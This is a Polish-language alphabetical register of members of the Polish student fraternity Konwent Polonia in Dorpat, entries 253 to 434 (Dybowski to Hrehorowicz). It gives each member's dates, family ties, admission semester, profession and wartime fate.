 253. Adolf Dyakowski, (1913 - 23 sierpnia 1985) - s. Stanisława, coetus II sem. 1933/34, ppor. 3 p.p., żołnierz września, odznaczony Krzyżem Walecznych, w niewoli niemieckiej w oflagu. Po wojnie urzędnik w Warszawie, b. aktywny w życiu K! [1480]
 254. Benedykt Dybowski, (1833-1930) - s. Jana, brat Władysława (559), coetus I sem. 1853, przyczynił się do rozbicia „Ogółu” i powstania „Szczegółu”. Zesłany za powst. 1863 r., wybitny badacz Syberii, prof. Uniw. Lwowskiego, czł. PAU, dr h.c. USB. Autor wspomnień [440]
 255. Emil Dybowski, (1829 - przed 1912) - s. Leopolda, coetus II sem. 1847, za powst. 1863 r. zesłany, autor wspomnień [288]
 256. Władysław Dybowski, (1839 - 1910) - s. Jana, brat Benedykta (440), coetus II sem. 1857, zoolog, paleozoolog, florysta; doc. pryw. Uniw. w Dorpacie [559]
 257. Adolf Dymowski, (1847 - 1913) - coetus I sem. 1870, pastor e.a. w Pułtusku [678]
 258. Kleofas Dymsza, (1821 - 1902) - s. Piotra, brat Justyna (202), ziemianin, coetus I sem. 1842, towiańczyk, za powst 1863 r. zesłany, pamiętnikarz [201]
 259. Justyn Dymsza, (1822 - 1854) - s. Piotra, brat Kleofasa (201), ziemianin, coetus I sem. 1842 [202]
 260. Antoni Dyżewski, (1809 - po 1852) - coetus I sem. 1832, nauczyciel, emigrant [37]
 261. Jarosław Dwernicki, (1840 - ?) - s. Tytusa, z Podola, coetus I sem. 1860 [600]
 262. Aleksander Bohdanowicz Dworzecki, (1847 - 1884) - ziemianin z Witebszczyzny, coetus II sem. 1865 [631]
 263. Aleksander Dziakowicz, (1906 -1974) - ochotnik WP (1920), coetus II sem. 1926/27, później w Korporacji Vilnensia, rzędnik Wil. Banku Ziemskiego. Po wojnie pracował w banku w Łodzi [1407]
 264. Józef Dzid, (1830 - 1852) - coetus II sem. 1850, zmarł w czasie studiów [378]
 265. Edmund Dziechciński, (1885 - 1908) - s. Edmunda, coetus II sem. 1906, popełnił samobójstwo (w Warszawie) [1166]
 266. Józef Bohdan Dziekoński, (1816 - 1855) - s. Tomasza, coetus I sem. 1837, pisarz, emigrant, „bursz nad bursze” [120]
 267. Kazimierz Dziekoński, (1857-1913) - s. Eustachego, coetus I sem. 1877, lekarz, ziemianin z gub. suwalskiej [758]
 268. Hieronim Dzieszuk, (1813 - przed 1899) - s. Hieronima, coetus II sem. 1835, nauczyciel, bibliotekarz [94]
 269. Roman Dziewicki, (1849 - 1927) - s. Romana, coetus II sem. 1873, lekarz, kpt. 15 płk. uł. (w l. 1918 - 1922) [727]
 270. Konstanty Dziewulski, (1885-1939) - s. Henryka, coetus II sem. 1907, autor uchwały (6 II 1909), która ustanowiła stopień barwiarza. Ziemianin, prof. WSH W-wa. Zamordowany przez Niemców 8 XI w Poznaniu [1206]
 271. Stefan Dziubiński, (1885 - 3 października 1944) c. II sem. 1907, lekarz, kpt WP, zmarł w czasie powstania warszawskiego [nr ew. 1185]
 272. Marcin Ehrlich, (1835 - 1899) - s. Marcina, coetus I sem. 1857, lekarz i działacz społeczny w Płocku. Napisał: Życie i miłość (Płock 1895) [555]
 273. Emil Aleksander Eichelberger, (1865 - 1942) - coetus I sem. 1885, pastor e.a. w Mariampolu [949]
 274. Witold Eichler, (1874 - 1960) - s. Edwarda, coetus II sem. 1895, lekarz, entomolog, zgromadził ogromne zbiory przyrodnicze i etnograficzne, w Pabianicach założył muzeum, „Gazetę Pabianicką”. Jego imię nosi kilka chrząszczy [1103]
 275. Michał Ejner, (1858 - ?) - coetus I sem. 1883, lekarz, Abele (Kowieńszczyzna) [895]
 276. Mieczysław Ejsmont, (22 listopada 1912 w Mińsku Litewskim - 18 września 1944 w Warszawie) s. Witolda i Janiny, absolwent gimnazjum w Mołodecznie 1931, student chemii USB, c. I sem. 1933/34, skreślony 1935, przeszedł przeszkolenie w Szkole Podchorążych Artylerii w Toruniu, oficer służby stałej, w wojnie obronnej 1939 ppor. art., w czasie okupacji oficer AK ps. “Miecz” i “Maczek” w Warszawie w oddziale „Wigry”, zginął w powstaniu warszawskim, pochowany na Powązkach (cmentarz komunalny 1 kwatera wojenna) [nr ew. 1473]
 277. Marian Elkner, (1859 - po 1914) - s. Aleksandra, brat Stanisława (873), coetus I sem. 1882, lekarz w Kamieńcu Podolskim [874]
 278. Stanisław Elkner, (1854 - ?) - s. Aleksandra, brat Mariana (874), coetus I sem. 1882, aptekarz w Szarogrodzie [873]
 279. Aleksander Engel, (1844 -1866) - coetus I sem. 1864, zmarł w czasie studiów [622]
 280. Lionel Engler, (1833 -?) - coetus I sem. 1855, prawnik w Warszawie [503]
 281. Eugeniusz Epstein, (1860 - 1946) -s. Leona, brat Stefana (851), coetus I sem. 1881, od 1889 r. adwokat w Petersburgu [850]
 282. Stefan Epstein, (1861 - 1924) - s. Leona, brat Eugeniusza (850), coetus I sem. 1881, dr ekonomii, urzędnik w Rosyjskim Banku Handlu Zagranicznego w Petersburgu [851]
 283. Szymon Epstein, (1861 - 1887) - z Warszawy, coetus II sem. 1882, zmarł w czasie studiów [876]
 284. Władysław Epstein, (1864 - 1926) - s. Jakuba, coetus II sem. 1883, kierował konwentową strażą pożarną („Polonia Spritze”), lekarz, w Bielsku Podl. założył Ochotniczą Straż Pożarną [907]
 285. Antoni Erdmann, (1849 - ?) - s. Adolfa, ziemianin z gub. kowieńskiej, coetus I sem. 1868 [657]
 286. Edmund Erdmann, (1847 - 1892) - coetus II sem. 1866, pastor e. r. w Grodźcu Korycińskim [648]
 287. Oskar Ernst, (1872-1922) - s. Traugota, coetus I sem. 1895, pastor e.a. w Nowym Dworze Maz. [1100]
 288. Jan Anzelm Essenburger, (1867- ok. 1915) - coetus II sem. 1887, pastor e.a. w Lipnie, wywieziony w czasie I woj. św. do Rosji, tam zmarł [1008]
 289. Wacław Eydrygiewicz, (1869 - ?) - s. Antoniego, z Kowieńszczyzny, coetus II sem. 1891 [1069]
 290. Jan Eysymontt, (1829 - ?) - coetus II sem. 1851, urzędnik w Radomiu [400]
 291. Jerzy Eysymontt, (1908 - 1963) - s. Jana, coetus II sem. 1926/27, kierownik Oddziału Polit. - Narodowościowego w Urz. Wojewódzkim w Wilnie. W wrześniu 1939, przez Litwę dostał się do Francji. Por. w Bryg. Strzelców Podhalańskich (d-ca plut. ckm), brał udział w bitwie pod Narwik (odzn. Krzyżem Walecznych), przez rok internowany na płd. Francji, uciekł i przez Pireneje, Madryt, Lizbonę, Gibraltar, dotarł do Londynu (2 X 1941 r.). Pracuje w Biurze Szyfrów Sztabu Generalnego. We wrześniu 1943 przerzucony do Włoch do bazy obsługującej logistycznie zrzuty lotnicze na teren Polski (Baza nr 11, Kierownictwa Akcji Specjalnych) nominowany do st. kpt. Wraca do Londynu w przeddzień zakończenia wojny, do poł. 1946 r. w Sztabie Generalnym. Po demobilizacji pracuje jako konduktor w londyńskim metro. W 1957 r. wraca do kraju. Pozostawił interesujące „Dzienniki” z lat wojny. [1409]
 292. Jan Stanisław Fabian, (1875 -1907) - s. Aleksandra, coetus I i II sem. 1894, pastor e. a. w Piotrkowie Tryb., współzałożyciel Koła Teologów Polskich w Dorpacie; red. „Zwiastuna Ewangelickiego” [1095]
 293. Stanisław Falewicz, (1904 - 1935) - coetus I sem. 1925/26, ziemianin, usiłował przemycić z Litwy do Polski byka, złapany na granicy, aresztowany - uważał, że jest zhańbiony - popełnił w więzieniu samobójstwo [1392]
 294. Józef Falęcki, (1870 - 1944) - s. Adolfa, coetus II sem. 1891, lekarz w Sosnowcu [1068]
 295. Eugeniusz Falkowski, (1885-1945) - s. Wincentego. Członek komisji dla ułożenia kartelu z Arkonią (1909), mjr 3 p. uł. WP (1918-1921). Szef Sądu Wojsk. Litwy Środk.-odzn. Krzyżem Zasługi Litwy Środk. Adwokat (konsystorski) [1211]
 296. Stanisław Falkowski, (1816 - ?) - coetus I sem. 1837, uczestnik spisku K. Hildebrandta, emigrant [110]
 297. Stanisław Falkowski II, (1884 - 1939) - s. Adolfa, ochotnik WP (1920 - 21), coetus I sem. 1909, kpt WP, prezes Sądu Okręgowego w Pińsku, aresztowany i zamordowany przez bolszewików 18 IX (w czasie konwoju) [1230]
 298. Aleksander Falzman, (1887 - 1942) - s. Roberta, coetus II sem. 1909, pastor e.a. 28 IX 1939 r. aresztowany przez Gestapo, wywieziony do Dachau, zamordowany (4 V) [1237]
 299. Wilhelm Fejertag, (1888 - 1927) - coetus II sem. 1907, kpt. WP 1918 - 21, Wilno [1196]
 300. Bohdan Feliński, (1855 - 1922) - s. Alojzego, wuj B. Wydżgi (863), coetus II sem. 1877, adwokat w Łucku [768]
 301. Henryk Hofman de Felsenriff, (1913 - 1957) - s. Edwarda (1245), coetus I sem. 1931/32, żołnierz września, w oflagu. Po wojnie urzędnik w Min. Rolnictwa [1456]
 302. Stanisław Ficner-Jarski, (1896 - po 1940) - z Rygi, coetus II sem. 1914, przed II wojną świat. dyrektor, reżyser i aktor Teatru Polskiego w Rydze. W czerwcu 1940 r. wywieziony do ZSRR [1294]
 303. Edward Fiedler, (1829 - 1903) - s. Jana, coetus I sem. 1850, pastor e.a. w Bełchatowie [351]
 304. Antoni Fiedorowicz, (1833 - po 1912) - s. Marka, coetus I sem. 1854, lekarz pediatra w Warszawie [475]
 305. Henryk Filipowski, (1904 - ?) - z Poznania, coetus II sem. 1923/24 [1374]
 306. Władysław Fiorentini, (1823 - 1914) - s. Antoniego, coetus II sem. 1843, kupiec, działacz społ., kolekcjoner sztuki w Wilnie [223]
 307. Czesław Firer, (1915 - 16 września 1971) - coetus I sem. 1936/37, ostatni bufetowy K! przed wojną, obywatel łotewski, zmarł na Łotwie [1498]
 308. Konstanty Flatt, (1849 - po 1913) - s. Jana, coetus II sem. 1872, lekarz w gub. siedleckiej, kieleckiej, na Podolu [702]
 309. Maksymilian Flaum, (1864 - 1933) - s. Stanisława, coetus II sem. 1883, chemik, lekarz w Warszawie, przyrodnik. Płodny popularyzator wiedzy o chemii i medycynie [905]
 310. Justyn Frąckiewicz, (1824 - po 1888) - s. Kazimierza, coetus II sem. 1848, lekarz w Wiłkomierzu [315]
 311. Bronisław Fudakowski, (1838 - ?) - s. Ignacego, brat Bolesława (468), coetus II sem. 1856, prawnik, urzędnik Banku Polskiego w Warszawie [524]
 312. Bolesław Fudakowski, (1834 - 1878) - s. Ignacego, brat Bronisława (524), coetus II sem. 1853, doc. w Szkole Głównej Warszawskiej, chemik fizjolog, specjalista farmakologii, toksykologii i higieny [468]
 313. Stefan Fukier, (1889- 1919) - s. Henryka (ze znanej rodziny warszawskiej), coetus II sem. 1913 [1289]
 314. Stanisław Artur Furs, (1820 - po 1863) - uczestnik powst. 1863 r., zesłany [206]
 315. Lubomir Gadon (von Gaden), (1831 - 1908) - s. Alojzego, coetus I sem. 1852, w 1863 r. uciekł za granicę. Działacz emigracyjny, historyk, publicysta, bibliotekarz [412]
 316. Teodor Gaede, (1850 - ?) - coetus I sem. 1872, mieszkał w Lublinie [699]
 317. Aleksander Gajewski, (1857 - ?) - z Mohylewszczyzny, studiował medycynę, coetus I sem. 1880 [829]
 318. Wiktor Poraj-Garnysz, (1902 - ?) - ochotnik WP (1920), coetus I sem. 1922/23 [1351]
 319. Jakub Gassman, (1825 - 1862) - coetus II sem. 1847, pastor e.a. w Władysławowie i Nowosolnej [294]
 320. Jerzy Gaszyc (Gażyc), (1819 - po 1869) - s. Eugeniusza, coetus I sem. 1837, uczestnik spisku A. Reniera (1846), uczestnik powst. 1863 r., zesłany [112]
 321. Henryk Gawdzilewicz, (1840 - ?) - ziemianin gub. kowieńskiej, coetus II sem. 1859 [591]
 322. Aleksander Gawroński, (1829 - 1850) - coetus II sem. 1848, zmarł w czasie studiów [317]
 323. Zdzisław Geisler, (1877- po 1939) - coetus II sem. 1900, pastor e.a. w Nowosolnej, starosta w Słonimiu, dyr. Tow. Ubezp. „Polonia”, oddz. Bydgoszcz [1133]
 324. Oskar Geldner (Göldner), (1866 - ?) - s. Mikołaja, coetus I sem. 1890, aptekarz w Telszach [1050]
 325. Józef Gembski, (1884 - 1940) - coetus I sem. 1908, adwokat w Warszawie [1215]
 326. Gotlieb Rudolf Gensch, (1819 - 1856) - coetus II sem. 1840, pastor e.a. w Wierzbołowie [166]
 327. Franciszek Giedgowd, (1816 - 1893) - s. Ignacego, ziemianin, coetus II sem. 1835, uczestnik spisku K. Hildebrandta, zesłany [91]

  Walery Giedgowd

 328. Walery Giedgowd, (1865 - 1944 w Wilnie) s. Antoniego i Walerii z Piłsudskich, brat Stanisława (Welecja), c. II sem. 1882, lekarz, naczelny szpitala zakaźnego w Wilnie [nr ew. 887]

 329. Albin ks. Giedroyć, (1809-po 1863) - s. Ignacego, brat Kazimierza (14), ziemianin, coetus II sem. 1828, powstaniec 1831 r. i 1863 r. [15]
 330. Antoni ks. Giedroyć, (1848 - 1909) - s. Edmunda, coetus I sem. 1877, geolog - pracował (i publikował) tak na obszarach dawnej Rzeczypospolitej, jak i na Syberii (Kraj Zabajkalski) [756]
 331. Cezary Giedroyć, (1836 - 1899) - s. Adolfa, ziemianin, coetus I sem. 1854, marszałek szlachty pow. trockiego [473]
 332. Edmund Giedroyć, (1816 - przed 1889) - ziemianin z Wileńszczyzny, coetus I sem. 1834 [67]
 333. Jan Giedroyć, (1886 - 1950) - s. Jana, brat Tadeusza (1231), coetus II sem. 1906, adwokat, ziemianin (Litwa Kowieńska) [1167]
 334. Kazimierz ks. Giedroyć, (ok. 1808 - 1840) - s. Ignacego, brat Albina (15), ziemianin, coetus II sem. 1828 - pierwszy przyjęty do Konwentu, uczestnik powstania listopadowego [14]
 335. Melchior Giedroyć, (1814 - 1845) - ziemianin z Wileńszczyzny, coetus I sem. 1834 [66]
 336. Tadeusz Giedroyć, (1890 - 1941) - s. Jana, brat Jana (1167), student Politechniki Ryskiej, członek Welecji, później na studiach w Dorpacie, coetus I sem. 1909 Konwent Polonia, POW, w korp. Dowbór - Muśnickiego, mjr WP, odzn. Krzyżem Walecznych. Starosta Pow. w Wołkowysku, Augustowie i Białymstoku. Sędzia (w Dereczynie, Białymstoku, Zamościu, Łucku) Członek OZN, senator RP z woj. wołyńskiego (1938). Aresztowany przez NKWD i zastrzelony (razem z żoną) 26 VI [1231]
 337. Ignacy Gierłowicz, (1835 - przed 1899) - s. Hilarego, brat Władysława (570), coetus II sem. 1857, lekarz w Pińsku [568]
 338. Władysław Gierłowicz, (1837 - po 1887) - s. Hilarego, brat Ignacego (568), coetus II sem. 1857, lekarz w Słucku [570]
 339. Stefan Gierzyński, (ok. 1873 - ?) - coetus I i II sem. 1894 [1096]
 340. Karol Gimbutt, (1901 - 2 lutego 1978) - POW (1917-18), coetus II sem. 1923/24, w czasie wojny w AK (1940 - 44, Okręg Wilno), odznaczony Krzyżem Walecznych. Po wojnie w Toruniu, urzędnik w Woj. Przedsiębiorstwie Handlu Wewnętrznego [1376]
 341. Stanisław Girdwoyn, (1858 - 1884) - s. Teofila, coetus I sem. 1878, lekarz, zm. w Telszach zaraz po studiach [782]
 342. Aleksander Giżycki, (1858 - ?) - s. Wacława, brat Kazimierza (804), ziemianin na Podolu, coetus I sem. 1878 [781]

  Aleksander Gozdawa-Giżycki, prawd. 1928 r.

 343. Aleksander Gozdawa-Giżycki, (1900 - 1940) - s. Włodzimierza, w WP (1919 - 20), wyróżnił się w bitwie pod Chołojowem, odznaczony Krzyżem Walecznych, coetus II sem. 1925/26. Urzędnik w Banku Handlowym w Wilnie. W niewoli sowieckiej w obozie w Kozielsku. Zamordowany w Katyniu [1396]

 344. Kazimierz Giżycki, (1860 - po 1889) - s. Wacława, brat Aleksandra (781), coetus I sem. 1879, ziemianin na Podolu [804]
 345. Jan Marek Giżyński, (1844 - 1925) - s. Kazimierza, coetus II sem. 1866, nauczyciel gimnazjalny (w Mitawie), historyk. Bogaty publikowany dorobek naukowy [646]
 346. Feliks Głogowski, (1829 - 1910) - s. Jana, coetus I sem. 1849, lekarz i działacz społeczny w Lublinie [337]
 347. Józef Głowacki, (1829 - 1893) - s. Bogusława, coetus I sem. 1848, pastor e.r., generalny superintendent w Wilnie [300]
 348. Julian Głowacki, (1832 - 1881) - coetus I sem. 1855, nauczyciel gimn. w Samarze [507]
 349. Stanisław Głuchowski, (1835 - 1884) - coetus I sem. 1870, sędzia w Tyflisie (Tbilisi) [679]
 350. Michał Godlewski, (1830 - 1849) - coetus I sem. 1849, zmarł (utonął) w czasie studiów [330]
 351. Witold Godlewski, (1900 - 27 września 1982) - s. Wiktora, ochotnik WP (1919-20), coetus II sem. 1919/20, pracownik Wil. Banku Ziemskiego. Aresztowany w 1940 r, wywieziony do Workutłagu, zwolniony 3 III 1942 r., wyszedł z ZSRR z II Korpusem. Po wojnie na emigracji w Brazylii i Argentynie, gdzie zmarł [1324]
 352. Gotlieb Görne, (1818 - 1846) - coetus I sem. 1842, pastor e.a., w Suwałkach [204]
 353. Zygmunt Golc (Golz), (1867 - 1926) - coetus II sem. 1886, lekarz w Łodzi [978]
 354. Bolesław Goławski, (1854 - 1907) - s. Michała, coetus II sem. 1872, lekarz w Brześciu Lit. [705]
 355. Jerzy Gołoński, (1900 - 1962) - s. Ludwika, ochotnik WP (1918 - 20), coetus I sem. 1922/23, w wrześniu 1939 r. internowany na Litwie, uciekł z obozu. Lekarz, po wojnie w Białymstoku [1352]
 356. Władysław Gorecki, (1900 - 1944) - s. Piotra, jego babka była wnuczką A. Mickiewicza, coetus II sem. 1923/24, ochotnik WP (1919 - 20), pracownik Wil. Banku Ziemskiego. W 1944 r. uciekł przed bolszewikami do Warszawy. Po powst. Warszawskim wywieziony do obozu Flossenburg - tam zamordowany (22 XII) [1372]
 357. Kazimierz Gorski, (1827 - ?) - ziemianin na Żmudzi, coetus II sem. 1846 [270]
 358. Konstanty Gorski, (1823 - 1864) - coetus II sem. 1845, prof. Szkoły Głównej w Warszawie, zoolog [259]
 359. Emil Gosławski, (1819 - 1880) - s. Sotera, coetus II sem. 1840, lekarz w Radomiu, uczestnik powst. 1863 r. [175]
 360. Konstanty Gościcki, (1864 - ?) - coetus II sem. 1887, lekarz w Kownie [1006]
 361. Ludwik Górski, (1861 - ?) - coetus II sem. 1882, lekarz w Warszawie [892]
 362. Wincenty Górski, (1814 - 1841) - coetus II sem. 1835, nauczyciel domowy Kajetana Kraszewskiego [93]
 363. Wojciech Górski, (1910 - 1944) - s. Witolda, coetus I sem. 1930/31, pracował w konsulacie RP w Lille, w czasie wojny we francuskim ruchu oporu - zamordowany przez Niemców ((18 VIII) [1440]
 364. Edwin Grabowski, (1833 - 1866) - coetus I sem. 1856, urzędnik pocztowy w Petersburgu [523]
 365. Waldemar Graetzer, (1914 - ?) - coetus II sem. 1933/34, w czasie wojny w Warszawie, po 1956 r. wyemigrował do Niemiec [1479]
 366. Zygmunt Grekowicz, (1912 - 1940) - s. Józefa, ziemianin, ppor. WP, żołnierz września, w niewoli sowieckiej w obozie w Kozielsku, zamordowany w Katyniu [1463]
 367. Jan Grillicz-Gryzima, (1891-1939) - brat Włodzimierza (1251), coetus I sem. 1912, ochotnik WP (1920), kapitan, ziemianin, zamordowany przez bolszewików 7 X [1266]
 368. Włodzimierz Grillicz-Gryzima, (1892- 1944) - brat Jana (1266), coetus I+G13377I sem. 1910, adwokat w Warszawie, zamordowany przez NKWD (11 VIII) [1251]
 369. Włodzimierz hr. Grocholski, (1857 - 1914) - s. Mieczysława, ziemianin, coetus I sem. 1878, działacz oświatowy i gospodarczy na Ukrainie, założył „Dziennik Kijowski” (1905), poseł do I Dumy (1906), przeciwnik lojalizmu [786]
 370. Hilary Grochowski, (1832 - ?) - s. Jakuba, coetus I sem. 1852, lekarz w Odessie [420]
 371. Romuald Grünnagel, (1845 - ?) - coetus I sem. 1869, nauczyciel [663]
 372. Emil Grużewski, (1814 - ok. 1888) - s. Józefa, brat Zygmunta (32) i Oskara (58), ziemianin, coetus II sem. 1833, po powst. 1863 r. zesłany [57]
 373. Oskar Grużewski, (1813 - 1862) - s. Józefa, brat Zygmunta (32) i Emila (57), ziemianin, coetus II sem. 1833 [58]
 374. Zygmunt Grużewski, (1812 - 1880) - s. Józefa, brat Emila (57) i Oskara (58), ziemianin, coetus II sem. 1830, represjonowany po powstaniu 1863 r. [32]
 375. Bolesław Grygowicz, (1836 - 1855) - s. Karola, coetus I sem. 1855, zmarł w czasie studiów [501]
 376. Eugeniusz Edward Gulczyński, (1903 - 1944) - POW (1919 -20), coetus II sem. 1926/27, mgr historii, referendarz w USB. Już od jesieni 1939 r. w konspiracji. Aresztowany przez NKWD uciekł z ostatniego transportu więźniów (nocą 24/25 VI 1941 r.). Wrócił do pracy konspiracyjnej ZWZ - AK, redaktor prasy podziemnej, aresztowany na początku 1944 r. przez gestapo, torturowany, nie wydał nikogo. Zamordowany 23 VI [1405]
 377. Franciszek Guliński, (1846 - 1925) - s. Stanisława, przed studiami brał udział w powst. 1863 r. (walczył w oddz. D. Czachowskiego), coetus II sem. 1873, lekarz, ginekolog w Warszawie [718]
 378. Adolf (Alfons) Gumiński, (1813 - 1865) - coetus II sem. 1836, nauczyciel, guwerner Instytutu Szlacheckiego w Wilnie [101]
 379. Rudolf Gundlach, (1850 - 1922) - s. Jana, ojciec Zygmunta i Rodolfa (Weleci), pastor e.a., zasłużony dla Łodzi działacz społ. [682]
 380. Ludwik Guranowski, (1853 - 1926) - s. Bernarda, coetus II sem. 1872, lekarz - otolaryngolog, założył „Polski Przegląd Otolaryngologiczny”, miał znaczny dorobek naukowy [707]
 381. Ignacy Gurbski, (1861 - 1933) - s. Jana, brat Stanisława (1110), coetus II sem. 1880, lekarz w Radomsku [841]
 382. Stanisław Gurbski, (1871 - 1940) - s. Jana, brat Ignacego (841), coetus II sem. 1895, lekarz, naczelny chirurg w korpusie gen. J. Dowbór Muśnickiego. Odzn. Krzyżem Walecznych; gen. bryg. WP. Pierwszy prezes Tow. Lekarzy Ofic. Rezerwy [1110]
 383. Włodzimierz Gurowski, (1865 - po 1938) - coetus I sem. 1886, ziemianin z Wołynia [968]
 384. Teodor Gutekunst, (1852 - 1916) - coetus I sem. 1869, prawnik, Płock [665]
 385. Bronisław Gutowski, (1835 - ?) - coetus I sem. 1855, ziemianin w gub. grodzieńskiej [508]
 386. Paweł Gużewski, (1826 - 1883) - s. Pawła, ziemianin, coetus II sem. 1844, za powst. 1863 r. pociągnięty do śledztwa [231]
 387. Aleksander Gzowski, (1865 - 1931) - coetus II sem. 1885, dr chemii, zmarł w Radomiu [962]
 388. Jan Adam Haberkant, (1829 -1905) - s. Jana, coetus II sem. 1849, pastor e.a. m. in. w Łomży i Kaliszu, za powst. 1863 r. zesłany [342]
 389. Ferdynand Haefke, (1826 - 1886) - coetus II sem. 1845, pastor e.a [258]
 390. Robert Haefke, (1868 - 1920) - s. Ferdynanda, coetus II sem. 1889, pastor e.a. w Wieluniu [1047]
 391. Maksymilian Hager, (1856 - 1918) - s. Ignacego, coetus I sem. 1878, lekarz w Zabrzu, działacz narodowy na Górnym Śląsku (w 1905 r. stał na czele zwycięskiej kampanii wyborczej W. Korfantego) [784]
 392. Władysław Halicki, (1912 - 1975) - coetus I sem. 1932/33, ppor. WP, żołnierz września, odznaczony Krzyżem Walecznych, był w oflagu. Po wojnie urzędnik Min. Przemysłu Rolnego [1464]
 393. Tadeusz Hamburg, (1881 - ?) - z pow. kieleckiego, coetus II sem. 1904 [1161]
 394. Wacław Hanicki, (1868 - 1913) - s. Kamila, coetus I sem. 1890, lekarz w Warszawie [1053]
 395. Bronisław Hassenbein, (1889-1961) - coetus II sem. 1907, ochotnik WP (1920), adwokat w Radomiu [1208]
 396. Wiktor Hassman, (1819 - 1892) - s. Franciszka, coetus II sem. 1840, lekarz, w 1861 r. aresztowany za „przestępstwa polityczne” [173]
 397. Wiliam (Wilhelm) Hay, (1853 - 1901) - coetus II sem. 1872, lekarz, społecznik w Żyrardowie, numizmatyk-amator [703]
 398. Tadeusz Heibert, (1898-1962) - s. Stanisława, coetus II sem. 1920/21, POW, ochotnik WP (1920 - 21), prok. Sądu Okręgowego w Grudziądz u, adwokat, żołnierz AK, adwokat, prezes Wileńskiego Koła Międzykorporacyjnego, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA [1332]
 399. Adolf Heinrich, (1867 - ?) - z Tomaszowa Maz., coetus II sem. 1890 [1061]
 400. Edward Heinrich, (1840 - 1922) - s. Teodora, coetus I sem. 1860, jedna z największych postaci w dziejach Konwentu, moralny przywódca kilku pokoleń Dorpatczyków, autor pamiętników [598]
 401. Stefan Heinrich, (1867 - 1889) - z Warszawy, coetus II sem. 1886 [976]
 402. Michał Hejbowicz, (1852 - 1883) - coetus I sem. 1873, nauczyciel w Petersburgu [712]
 403. Karol Henkel, (1841 - 1915) - s. Karola, coetus I sem. 1861, pastor e.r., przeszedł na luteranizm, pastor e.a. w Koninie [604]
 404. Ludomir Hensel (Haensel), (1827 - 1851) - coetus I sem. 1851, zmarł w czasie studiów [397]
 405. Hugon Herman, (1833 - 1864) - s. Christiana, coetus II sem. 1851, pastor e. a. w Babiaku Kaliskim; w 1863 r. aresztowany [410]
 406. Włodzimierz Hertz (Samopęd), (1872 - 1961) - s. Roberta, coetus II sem. 1892, autor przyjętego przez Konwent (1896) projektu „o sumacji kar moralnych”; lekarz, brał udział w wojnie 1920 r., autor wspomnień [1075]
 407. Otto Hewelke, (1825 - 1865) - s. Jana, coetus I sem. 1842, pastor e.a. w Pułtusku [205]
 408. Karol Hildebrandt, (1815 - po 1857) - s. Karola, coetus II sem. 1837, przywódca spisku w Dorpacie, zesłany [129]
 409. Karol Hilkner, (1826 - 1887) - coetus I sem. 1844, pastor e.a. w Pilicy [225]
 410. Fryderyk Hilsenitz, (1810 - 1863) - ziemianin w powiecie siebieskim guberni witebskiej, coetus II sem. 1929 [24]
 411. Aleksander Hindemith, (1836 - 1897) - s. Karola, coetus I sem. 1855, lekarz, działacz społeczny w Kaliszu [500]
 412. Brunon Hindemith, (1858 - 1897) - zapewne s. Aleksandra (500), coetus II sem. 1877, lekarz w Kaliszu [769]
 413. August Hirszowski, (1824 - 1892) - coetus I sem. 1845, pastor e.a. w Przedeczu, aktywnie współdziałał z powst. 1863 r. [250]
 414. Cezary Hłasek, (1858 - po 1913) - s. Władysława (313), brat Wacława (839), Stefana (878) i Wiktora (965), coetus II sem. 1880, lekarz w Żytomierzu [838]
 415. Wacław Hłasek, (1859 - 1918) - s. Władysława (313), brat Cezarego (838), Stefana (878) i Wiktora (965), coetus II sem. 1880, lekarz na Wołyniu [839]
 416. Wiktor Hłasek, (1861- po 1902) - s. Władysława (313), brat Cezarego (838), Wacława (839) i Stefana (878), coetus I sem. 1886, ziemianin z Wołynia [965]
 417. Władysław Hłasek, (1829 - 1883) - s. Augusta, coetus II sem. 1848, lekarz na Wołyniu [313]
 418. Stefan Hłasek-Hłasko, (1862-1934) - s. Władysława (313), brat Cezarego (838), Wacława (839) i Wiktora (965), coetus II sem. 1882, dyr. Obserwatorium Geofiz. w Tbilisi, w wolnej RP płk. WP, dyr. Państw. Inst. Meteorologicznego [878]
 419. Bernard Hłasko, (1858 - 1928) - s. Mikołaja, coetus I sem. 1880, lekarz w Wilnie, społecznik, współtwórca Wil. Koła Filistrów (1922) [828]
 420. Jan Hoene, (1849 - 1921) - s. Henryka, coetus II sem. 1866, współautor libretta „operetki” konwentowej Na kwaterze. Lekarz okulista, początkowo w wojsku, następnie w Kijowie i Warszawie, autor kilkunastu prac z tego zakresu [643]
 421. Edward Hofman, (1879 - 1941) - s. Henryka, coetus II sem. 1909, dyr. szkół średnich (Płock, Suwałki, Brześć Lit.) [1245]
 422. Fryderyk Hoffman, (1836 - ?) - studiował chemię w latach 1857-59, coetus II sem. 1857 [564]
 423. Edmund Paweł Holtz, (1855 - 1917) - coetus I sem. 1873, pastor e.a. Łódź, publikował [717]
 424. Antoni Hołówko, (1864 - 1926) - s. Władysława, coetus II sem. 1883, lekarz - właściciel lecznicy w Dynaburgu, w 1921 r. kierownik Wydz. Ziem Wsch. w Min. Zdrowia Publicznego [918]
 425. Kazimierz Hołyński, (1854 - ?) - oficer (ros.), ziemianin w gub. kijowskiej, coetus I sem. 1874 [725]
 426. Władysław Julian Homan, (1882 - przed 1938) - coetus II sem. 1903, prawnik, radca w Min. Reform Rolnych [1154]
 427. Józef Hornowski, (1819 - 1843) - coetus II sem. 1838, zmarł w Wilnie, wkrótce po studiach [142]
 428. Artur Horwatt, (1831 - przed 1889) - s. Daniela, ziemianin, coetus I sem. 1849, marszałek szlachty [328]
 429. Ildefons Houwalt, (1910 - 1987) - coetus I sem. 1932/33, ppor. WP, żołnierz września, żołnierz AK. Artysta malarz (w Poznaniu) [1461]
 430. Aleksander Hrehorowicz, (1830 - przed 1889) - s. Karola, brat Władysława II (326), coetus II sem. 1848, ziemianin z pow. słuckiego [325]
 431. Antoni Hrehorowicz, (1853 - 1920) - s. Władysława (42), brat Tadeusza (662), Jana (787) i Wiktora (942), ziemianin w gub. wileńskiej, coetus II sem. 1872, zamordowany przez bolszewików [706]
 432. Jan Hrehorowicz, (1857 - ?) - s. Władysława (42), brat Tadeusza (662), Antoniego (706) i Wiktora (942), coetus I sem. 1878, adwokat w Mińsku Lit. [787]
 433. Mieczysław Hrehorowicz, (1834 - przed 1889) - ziemianin w gub. mińskiej, coetus I sem. 1851 [393]
 434. Teodor Hrehorowicz, (1848 - po 1898) - s. Władysława (42), brat Antoniego (706), Jana (787) i Wiktora (942), coetus II sem. 1868, prawnik, doc. U.W., prof. Uniw. w Kazaniu [662]
